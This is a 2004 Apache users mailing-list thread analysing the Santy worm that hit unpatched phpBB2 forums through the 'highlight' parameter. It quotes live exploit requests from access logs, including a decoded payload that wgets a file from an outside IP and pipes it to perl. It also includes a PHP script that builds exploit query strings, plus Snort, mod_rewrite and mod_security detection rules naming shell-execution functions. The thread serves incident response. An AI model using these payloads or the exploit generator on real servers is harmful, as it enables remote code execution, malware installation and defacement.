From Dave Floyd <dave.fl...@pa.press.net>
Subject Re: [users@httpd] Is this for real?
Date Sat, 25 Dec 2004 10:13:01 GMT
Anders,
	Sadly this is quite likely. See the appended messages for more details:

At 20:23 +1100 21/12/2004, L. Walker wrote:
>Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)
>Subject: Worm hitting PHPbb2 Forums
>From: "L. Walker" <lwalker@magi.net.au>
>To: incidents@securityfocus.com
>Cc: full-disclosure@lists.netsys.com
>
>Just spotted two clients hit by this.  One client didn't update his
>software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
>Chkrootkit says it's Adore, however could be something else.  Datacenter
>wasn't very smart and has since wiped the server, so no binaries or other
>evidence.
>
>Generation 12 only wiped out PHP files, replacing them with its own
>message on other client's PHPbb2 forum.  Access logs show:
>
>
>--
>L. Walker <lwalker at magi dot net dot au>
>Network Administrator / Consultant
>--
>
>>At 12:46 -0500 21/12/2004, Christopher Adickes wrote:
>
>In addition to your post here is some more info. 
>
>http://isc.sans.org/
>
>>At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
>
>From what I have read, this can happen in any phpbb version lower than 2.0.11
>
>This exploit is becoming frequent.  Normally uploading a ddos bot.
>>
>>At 12:53 -0500 21/12/2004, Chris Ess wrote:
>>
>>Generation 9 appears to overwrite files with the following extensions:
>>.htm, .php, .asp, .shtm, .jsp, .phtm
>>
>>It only displays a defacement message saying
>>
>>"NeverEverNoSanity WebWorm generation #"
>>
>>Where # is the generation of the worm.
>>
>>This bug only exploits a hole in phpBB2 as far as I can tell.  It does not
>>appear to exploit a hole within PHP.  In order to protect yourself, you
>>must upgrade phpBB2 to version 2.0.11.  See
>>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>>
>>The only code modification that this worm appears to do is increments its
>>generation count every time it hits a server.  Generation 9 does not
>>contain anything that would indicate the ability to install a rootkit.  I
>>suspect that the rootkit may have been installed separately.
>>
>>I extracted a full copy of generation 9 of this worm based on the access
>>logs of a site hit by it.  I was going to do a code review whenever I got
>>the chance to properly do one.
>>
>>Sincerely,
>>
>>
>>Chris Ess
>>System Administrator / CDTT (Certified Duct Tape Technician)
>
>>At 11:29 -0700 21/12/2004, lists <lists@innocence-lost.net> wrote:
>
>Funny enough, I got a message from a former employer about this worm
>yesterday- a box I had setup that had hardened php on it got hit hard by
>this worm. I must've misread the advisory as I was under the impression
>that the Hardened PHP patches protected PHP through canary values from
>this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>>At 14:14 -0500 21/12/2004, Chris Ess wrote:
>
>> Funny enough, I got a message from a former employer about this worm
>> yesterday - a box I had setup that had hardened php on it got hit hard by
>> this worm. I must've misread the advisory as I was under the impression
>> that the Hardened PHP patches protected PHP through canary values from
>> this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>This worm appears to have nothing to do with the bugs fixed in versions
>4.3.10 and 5.0.3 of PHP.
>
>The bug occurs in this line in viewtopic.php in phpBB2:
>(Formatting changed to make it look pretty.  It's line 1109 in phpBB2
>2.0.10)
>
>$message = str_replace('\"', '"',
>	substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
>	"preg_replace('#\b(" . $highlight_match . ")\b#i',
>	'<span style=\"color:#" . $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')",
>	'>' . $message . '<'), 1, -1));
>
>The 'e' flag on the regex pattern tells it to interpret the statement as
>valid PHP code and run it.  (Reference is:
>http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
>
>The bug that is exploited works in such a way that it actually runs the
>command that is passed through the highlight GET variable.  I'm not 100%
>sure how this works since I haven't had the chance to correlate the
>strings recorded in apache's access log with the above code.
>
>>At 12:21 -0700 21/12/2004, lists wrote:
>
>Yea good catch, after looking into it a little further I found that it
>wasn't related to that advisory, but rather to one from 11.13.04, the
>exploit code of the original bug can be found on k-otik.com
>
>Thanks for the info
>
>>At 21:00 +0000 21/12/2004, Barrie Dempster <barrie@reboot-robot.net> wrote:
>
>More information:
>
>Mis-reported and then corrected at the ISC -
>http://isc.sans.org/diary.php?date=2004-12-21
>
>* The advisory is here - htp://howdark.com/
>(it was there when the advisory was initially released but that site
>seems down atm, included here in hope that howdark.com resurfaces)
>
>* The fix is here - http://www.phpbb.com/phpBB/viewtopic.php?t=240513
>
>* The exploit is here - http://www.howdark.com/poc/phpbb2010_hl.phps
>(down as above, but included here as it was the original source, try
>here http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php )
>
>* SNORT Rule is here - http://www.webservertalk.com/message554529.html
>
>* If you got owned by this then your Christmas present is here
>http://ysati.com hehe ;-P
>
>With Regards..
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
>>At 13:28 -0500 21/12/2004, Mike <mike_sha@shaw.ca> wrote:
>
>Does this affect PHPBB2 in general, or is it platform specific as well?
>
>>At 19:53 -0500 21/12/2004, M. Shirk wrote:
>
>I missed an important "F" on my previous post for these snort sigs.
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS 
>(msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A 
>Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; 
>nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; 
>reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; 
>sid:9999999; rev:1;)
>
>Shirkdog
>http://www.shirkdog.us
>
>

At 15:51 -0800 20/12/2004, Shannon Lee wrote:
>Date: Mon, 20 Dec 2004 15:51:13 -0800
>From: Shannon Lee <shannon@webhostworks.net>
>To: bugtraq@securityfocus.com
>Subject: phpBB Worm
>
>This morning one of our client's sites was found to have been defaced
>with the words "NeverEverNoSanity WebWorm Generation 9."  The defacement
>appeared to take place on all .html files in the web root trees of
>multiple virtual hosts on the web server in a very short period of time.
>
>After some investigation, we determined that the attacker had gained
>access via phpbb in a series of crafted URL requests, like so:
>
>
>After checking the phpbb site, it turns out that this is a vulnerability
>posted the 18th of November, called Hilight; we didn't update to prevent
>it because the client whose domain it was has their own admin, and we
>thought he was taking care of phpBB.  Oops.  The exploit is described here:
>
>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>
>When I copied all these entries out of the log and translated the chr()
>calls, they turned out to be the attached perl script, which is capable
>of finding .html files to deface, and then going to google and finding
>more instances of phpbb to infect.  Which makes it a worm.  It also
>tracks itself by generation; we were generation 9.
>
>Please find attached the above-mentioned script as well as the series of
>log entries from access_log.
>
>--Shannon
>
>
>
>At 23:28 +0100 21/12/2004, Raymond Dijkxhoorn wrote:
>>
>>If you cannot fix it (virtual servers) fast for all your clients 
>>you could also try with something like this:
>>
>>        RewriteEngine On
>>        RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>        RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>        RewriteRule ^.*$                                -               [F]
>>
>>We had some vhosts where this worked just fine. On our systems we 
>>didn't see any valid request with echr and esystem, just be gentle 
>>with it, it works for me, it could work for you ;)
>
>At 15:11 -0500 21/12/2004, Paul Kurczaba wrote:
>>
>>It seems that a good number of sites have been compromised due to this
>>exploit. Doing a search for "NeverEverNoSanity WebWorm Generation" on google
>>revealed nothing. But, when I did the same search on the new MSN beta search
>>engine, a whopping 36,000 hits showed up. Check it out:
>>http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWo 
>>rm+Generation%22&FORM=QBRE
>
>At 12:22 +0100 22/12/2004, Sebastian Wiesinger <bofh@fire-world.de> wrote:
>>> We had some vhosts where this worked just fine. On our systems we didn't
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>If you use mod_security, this may help, too:
>>
>>SecFilterSelective "THE_REQUEST" 
>>"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
>>
>>I had another exploit attempt, with this payload:
>>
>>66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET 
>>/forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3 
>>B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31 
>>%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D% 
>>70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%6 
>>9%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68 
>>%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A% 
>>2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight= 
>>%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41% 
>>52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
>>
>>Which decodes to:
>>
>>rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
>>y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b 
>>*.pl b0t*; echo _END_
>>highlight='.passthru($HTTP_GET_VARS[rush]).'
>>
>>Regards,
>>
>>Sebastian
>
>At 17:21 +0200 22/12/2004, Alexander Klimov <alserkli@inbox.ru> wrote:
>>
>>It seems that automated exploiting starts soon after disclosure of the
>>vulnerability:
>>
>>62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
>>"GET /viewtopic.php?t=50674&highlight=
>>%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
>>HTTP/1.1" 404 219
>>
>>Interestingly, we do not use phpbb and in fact do not have 
>>viewtopic.php at all.
>
>At 4:34 +0000 22/12/2004, <ycw1bh302@sneakemail.com> wrote:
>>
>>Forgive me if this is a newbie question, but a site I help run was 
>>hit by this, and I'm trying to understand it to protect against 
>>future worms.
>>
>>The worm exploits the phpBB highlight vulnerability.  It uses PHP 
>>to run Perl to write the Perl script file, then executes it.  The 
>>script then proceeds to traverse the entire directory structure, 
>>overwriting .php, .htm, .shtm, .phtm, and on our server, .ssi 
>>files, and then spreads itself.  Correct?
>>
>>I have two questions:
>>
>>1.  Why has the worm been as effective on Windows servers as on 
>>*nix servers?  At the very least, shouldn't the difference in file 
>>and directory naming cause a problem?  I looked at the decoded Perl 
>>script, but I'm not a Perl expert, so I couldn't understand all of 
>>it.  And what about the difference in file permissions?
>>
>>2.  More importantly, why wasn't the worm's destructive ability 
>>limited by file permissions, especially on *nix servers?  If, for 
>>example, an HTML file on the server was uploaded by user bob, and 
>>has permissions of 755, how can the Perl script delete that file? 
>>Shouldn't the Perl script be created with the Perl process's 
>>permissions, which was invoked by PHP, which should have the Web 
>>server's permissions, which should be, at least on most *nix 
>>servers, the nobody user?
>>
>>This is a big issue on shared servers, or virtual hosts, whatever 
>>you want to call them.  Our site is on a shared server, and our 
>>site does not even run phpBB, but most of our HTML files were 
>>replaced with the worm's content.  Obviously, then, another site on 
>>the server must have an old version of phpBB.  But why could the 
>>worm, coming in through another site, modify files created by other 
>>users?  Even if the worm's script ran as the owner of the 
>>vulnerable viewtopic.php file, how could it then modify 
>>non-world-writable files created by other users?
>>
>>I have long been concerned with the security of PHP scripts, 
>>especially on shared servers.  Since PHP almost always runs as an 
>>Apache module, and Apache usually runs as nobody, one must make 
>>files and directories world-writable for PHP scripts to be able to 
>>write to them.  But that means that any process on the server, 
>>including anyone's PHP script, can modify the files.
>>
>>Thanks for any insights.
>>
>>Adam Porter
>
>At 21:28 -0600 22/12/2004, Alvin Packard wrote:
>>
>>Last look at my log files and I was hit a total of 421 times by 278
>>different IPs. It seems to be moving rather quickly as these were from
>>the last 2 days. Good luck to those who have not patched yet.
>>
>>Alvin Packard, CWNA
>>www.networksecuritytech.com
>
>At 13:31 +0100 23/12/2004, Anders Henke wrote:
>>> 1.  Why has the worm been as effective on Windows servers as on 
>>> *nix servers?  At the very least, shouldn't the difference in file 
>>> and directory naming cause a problem?  I looked at the decoded Perl 
>>> script, but I'm not a Perl expert, so I couldn't understand all of 
>>> it.  And what about the difference in file permissions?
>>
>>Perl does provide cross-platform-functions for e.g. file access and
>>there's usually not much of a difference for running a well-written
>>perl script on Unix as well as on Windows other than the first line
>>(usually '#!c:\perl\perl.exe -w' on Windows and '#! /usr/bin/perl -w'
>>on Unix).
>>
>>However, most Windows web servers other than Apache run any .pl script
>>using the installed Perl interpreter and don't care about the bang-line.
>>
>>The documentation found in 'perldoc perlport' does give a closer view
>>on the few differences when writing cross-platform perl scripts.
>>
>>> 2.  More importantly, why wasn't the worm's destructive ability 
>>>limited by file permissions, especially on *nix servers?  If, for 
>>>example, an HTML file on the server was uploaded by user bob, and 
>>>has permissions of 755, how can the Perl script delete that file? 
>>>Shouldn't the Perl script be created with the Perl process's 
>>>permissions, which was invoked by PHP, which should have the Web 
>>>server's permissions, which should be, at least on most *nix 
>>>servers, the nobody user?
>>
>>On shared servers with ISPs caring about security, user CGIs are using the
>>suexec mechanism in order to run each customer within his own user's space.
>>
>>The downside of using suexec is that PHP as a CGI doesn't offer a small
>>number of special features some people do believe to be essential, as well
>>as some people do write code in a way that making it work on PHP as CGI
>>is close to 'virtually impossible'. The PHP-Module also allows one to
>>set PHP-configuration settings via .htaccess; those configuration
>>changes are also ignored by CGI-PHP and can severely affect the way
>>an PHP-written application works (or doesn't work).
>>
>>> This is a big issue on shared servers, or virtual hosts, whatever 
>>>you want to call them.  Our site is on a shared server, and our 
>>>site does not even run phpBB, but most of our HTML files were 
>>>replaced with the worm's content.  Obviously, then, another site 
>>>on the server must have an old version of phpBB.  But why could 
>>>the worm, coming in through another site, modify files created by 
>>>other users?  Even if the worm's script ran as the owner of the 
>>>vulnerable viewtopic.php file, how could it then modify 
>>>non-world-writable files created by other users?
>>
>>
>>
>>Right - if everyone were using e.g. suexec, this would be the case.
>>
>>As a web host, you've got to choose to run either CGI-PHP or PHP as
>>module.
>>
>>Your 'power' users are calling for the module, the admin keeping
>>maintenance on an already overloaded server also calls for the module
>>(the module relieves the web server from forking a separate process for
>>running a php script), only the security-minded ones are rejecting both
>>mod_perl as well as mod_php and favour 'true' CGIs via suexec.
>>
>>If your scripts support the fastcgi extension, one might use mod_fastcgi
>>with suexec support; however, this means one has to setup three softwares
>>(fastcgi, suexec, php) and make them work together instead of the
>>often-recommended 'add mod_php'-Oneliner. As a result, you're spending
>>much work on a secure system, but your users are still calling for mod_php
>>and in case any part of your setup breaks, your whole system is unusable.
>>
>>> I have long been concerned with the security of PHP scripts, 
>>>especially on shared servers.  Since PHP almost always runs as an 
>>>Apache module, and Apache usually runs as nobody, one must make 
>>>files and directories world-writable for PHP scripts to be able to 
>>>write to them.  But that means that any process on the server, 
>>>including anyone's PHP script, can modify the files.
>>
>>
>>Yes, you've got the point.
>>
>>Apache 2 has the ability to run modules per VirtualHost within a different
>>user context (perchild MPM).
>>-According to the Apache documentation, this module is non-functional,
>> not yet finished and development is not currently active.
>>-PHP is certainly one of the most interesting modules for this feature,
>> however, the last time I looked, exactly PHP didn't support it and Apache
>> required to have at least one process running per virtualhost (which in
>> turn would render servers hosting thousands of sites unusable).
>>-Still today, the php documentation warns from using Apache 2.0 with PHP
>> in productive environment.
>>
>>From a security aspect, the only way for running PHP securely
>>(with 'secure' from the view of the administrator), CGI is currently
>>the only way to do so.
>>
>>
>>
>>Regards,
>>
>>Anders
>>--
>>Schlund + Partner AG              Security and System Administration
>>Brauerstrasse 48                  v://49.721.91374.50
>>D-76135 Karlsruhe                 f://49.721.91374.225
>
>At 23:34 +0000 22/12/2004, William Geoghegan wrote:
>>
>>A script to check if your phpBB is vulnerable.
>>Anything below 2.0.11 _probably_ is, but in case you're not sure, use 
>>this script.
>>
>>The script generates the request parameters, all you need to do is 
>>copy the result onto www.thesite.com/viewtopic.php
>>
>>
>><?
>>$rush='ls -al'; //do what
>>$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
>>
>>print "?t=%37&rush=";
>>
>>for ($i=0; $i<strlen($rush); ++$i) {
>> print '%' . bin2hex(substr($rush,$i,1));
>>}
>>
>>print "&highlight=%2527.";
>>
>>for ($i=0; $i<strlen($highlight); ++$i) {
>> print '%' . bin2hex(substr($highlight,$i,1));
>>}
>>
>>print ".%2527";
>>?>
>>
>>Cheers.
>>
>>William Geoghegan
>>
>>GEOTEK Computer Services
>>- www.geotekcs.co.uk -
>
>At 15:28 -0500 23/12/2004, Ofer Shezaf wrote:
>>
>>Interestingly enough the worm was probably developed on *nix and then
>>checked and corrected to work on Windows:
>>
>>	eval{
>>		while(my @a = getpwent()) { push(@dirs, $a[7]);}
>>	};
>>
>>	push(@dirs, '/ ');
>>
>>the getpwent function is not supported on Windows. Actually the entire
>>loop that gets users home directories from the /etc/passwd file is very
>>*nix centric.
>>
>>The author found that out, added the eval statement to prevent the
>>script from crashing on Windows and added the root directory in order to
>>have at least one entry on windows. This last line actually makes the
>>entire loop less important.
>>
>>Additionally, on Windows the worm would affect files on a single disk.
>>As to which disk exactly, it probably depends on the web server
>>attacked, and how PHP and Perl are installed and used with the web
>>server. In some cases, if the web sites and the software do not reside
>>on the same disk, the worm payload will not work.
>>
>>
>>Ofer Shezaf, CTO
>>Breach Security, Inc.
>>Deployable Application Security
>>
>>Tel: +972.9.956.0036 ext.212
>>Cell: +972.54.443.1119
>>ofers@breach.com
>
>At 13:59 +0100 23/12/2004, Anders Henke wrote:
>>> If you cannot fix it (virtual servers) fast for all your clients you could
>>> also try with something like this:
>>>
>>>         RewriteEngine On
>>>         RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>>         RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>>         RewriteRule ^.*$                                -               [F]
>>>
>>> We had some vhosts where this worked just fine. On our systems we didn't
>>> see any valid request with echr and esystem, just be gentle with it, it
>>> works for me, it could work for you ;)
>>
>>This assumes you're seeing GET-requests, but there are other ways
>>(e.g. POST) to exploit such code.
>>
>>GET-requests are so kind as they do show up in full in the web servers
>>access-log and as such, they do document the full exploit code.
>>E.g. just the accesslogs do provide enough information for site owner and
>>administrator to find out what's exactly broken and enables them to
>>perform detailed analysis on even previously unknown exploits as well
>>as reject such malicious code within a mod_rewrite RewriteRule.
>>
>>Today, most such exploits are sent using HTTP-GET, but there's a fairly
>>low expense for exploit code coders to run these exploits using HTTP-POST.
>>We're lucky that most exploit code coders haven't chosen the struggle to
>>properly encode their exploit-code HTTP-POST-requests, but still keep
>>in mind that a 'plain' Apache cannot filter the payload from HTTP-POST
>>other than rejecting =any= POST-request to 'specific' files like
>>viewtopic.php, which obviously will sooner or later break some application.
>>
>>I've already had a single case where a 'common' insecurity like
>>'include($some_user_supplied_data)' has been exploited using HTTP-POST,
>>so for the administrators out there, it might be a good idea to test and
>>implement mod_security on web servers.
>>As far as I know, the POST-payload analysis of mod_security is currently
>>one of the very few ways to audit and stop potentially malicious
>>HTTP-POST-data from reaching your web server's CGIs.
>
>At 16:10 +0000 24/12/2004, <steve@uptime.org.uk> wrote:
>>
>>>This assumes you're seeing GET-requests, but there are other ways
>>
>>>(e.g. POST) to exploit such code.
>>
>>Whilst I understand your point, it should be noted that this 
>>vulnerability in phpBB is susceptible only to GET-based attacks: 
>>the vulnerable data is sourced from $HTTP_GET_VARS.
>
>At 19:12 +0100 24/12/2004, Raymond Dijkxhoorn wrote:
>>
>>>Whilst I understand your point, it should be noted that this 
>>>vulnerability in phpBB is susceptible only to GET-based attacks: 
>>>the vulnerable data is sourced from $HTTP_GET_VARS.
>>
>>And it seems worse, we see even upgraded phpbb2 installs (2.0.11) 
>>successfully and actively being exploited.
>>
>>
>>Loads of those, and all request the files from civa.org
>>
>>This is on a patched phpbb2, so be aware!!
>
>
>


rgds



>Does anybody have any ideas on this e-mail?  My admin inbox was full 
>of these e-mails this morning, I don't know if
>they're for real, or what...  Can someone please advise? There is 
>one phpbb running on the server...
>
>
>HEADERS:
>
>Return-Path: <wwwrun@iris>
>Received: from mail.the-server.net ([unix socket])
>	by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
>X-Sieve: CMU Sieve 2.2
>Received: from localhost (localhost [127.0.0.1])
>	by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
>	Sat, 25 Dec 2004 00:50:23 +0100 (CET)
>Received: from mail.the-server.net ([127.0.0.1])
> by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
> id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
>Received: by mail.the-server.net (Postfix, from userid 30)
>	id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
>Date: Sat, 25 Dec 2004 00:48:48 +0100
>To: postmaster, hostmaster, abuse, admin, root
>Subject: YOUR SERVER HAS BEEN HACKED
>Message-ID: <41CCAAE0.mailC4S112L68@iris.the-server.net>
>User-Agent: nail 10.5 4/27/03
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>From: wwwrun (WWW daemon apache)
>X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
>
>
>MESSAGE BODY:
>
>YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
>
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>   "   from the digest: users-digest-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org


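As an added example (not code from this thread or from the phpBB project), here is a Python log decoder that reverses the two layers of URL encoding and the chr(N).chr(N) string building seen in the access-log entries quoted above, so an administrator can read what a request attempted without evaluating any of it. The sample log lines are constructed (the first mirrors Alexander Klimov's entry, the IPs on the others are documentation addresses), and the list of function names is taken from Sebastian Wiesinger's mod_security rule with eval added.

```python
"""Decode double-URL-encoded phpBB 'highlight' payloads out of Apache access logs.

The requests in this thread carry injected PHP as %2527 / %252e sequences (two
layers of URL encoding) and spell out strings with chr(N).chr(N)... so the
payload survives phpBB's filtering.  This reverses both layers and folds the
chr() runs into readable strings; nothing is executed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in Apache combined log format.  Line 1 mirrors the request
# quoted by Alexander Klimov; line 2 is a constructed rush/highlight variant with a
# harmless command; line 3 is an ordinary forum search and must not be flagged.
SAMPLE_LOG = """\
62.221.209.145 - - [24/Nov/2004:14:09:05 +0200] "GET /viewtopic.php?t=50674&highlight=%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527 HTTP/1.1" 404 219 "-" "-"
192.0.2.10 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%54%45%53%54%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"
192.0.2.11 - - [22/Dec/2004:10:07:00 +0100] "GET /forum/viewtopic.php?t=7&highlight=apache HTTP/1.1" 200 9001 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d+)'
)
# chr(N).chr(N)... runs, the way the worm builds its strings
CHR_RUN_RE = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")
# Function names from the mod_security rule quoted in the thread, plus eval
DANGEROUS_CALL_RE = re.compile(
    r"\b(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite|eval)\s*\("
)


def fold_chr(expr: str) -> str:
    """Replace chr(100).chr(105).chr(114) with "dir" (pure string folding, no eval)."""
    def repl(match):
        codes = [int(c) for c in re.findall(r"chr\((\d+)\)", match.group(0))]
        text = "".join(chr(c) for c in codes if c < 0x110000)
        return '"' + text.replace('"', '\\"') + '"'
    return CHR_RUN_RE.sub(repl, expr)


def decode_query(uri: str) -> dict:
    """Decode every parameter twice: once as the web server/PHP does, and once
    more as phpBB's own urldecode() of the highlight parameter does."""
    once = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return {name: fold_chr(unquote(values[-1])) for name, values in once.items()}


def analyse_line(line: str):
    """Return a dict describing the request, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = decode_query(m.group("uri"))
    reasons = []
    for name, value in params.items():
        stripped = value.strip()
        # The highlight injection closes phpBB's quoted string with '. and reopens it
        if stripped.startswith("'.") and stripped.endswith(".'"):
            reasons.append(f"{name}: breaks out of the quoted highlight string")
        call = DANGEROUS_CALL_RE.search(stripped)
        if call:
            reasons.append(f"{name}: calls {call.group(1)}()")
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": int(m.group("status")),
        "params": params,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


def scan_log(text: str) -> list:
    """Return the decoded record for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        rec = analyse_line(line)
        if rec and rec["suspicious"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["time"], hit["status"])
        for name, value in hit["params"].items():
            print(f"    {name} = {value}")
        print("    " + "; ".join(hit["reasons"]))
```

Feed it a real access_log with `scan_log(open(path).read())`; a 200 status on a flagged request is the case worth investigating first, as the thread's victims all show.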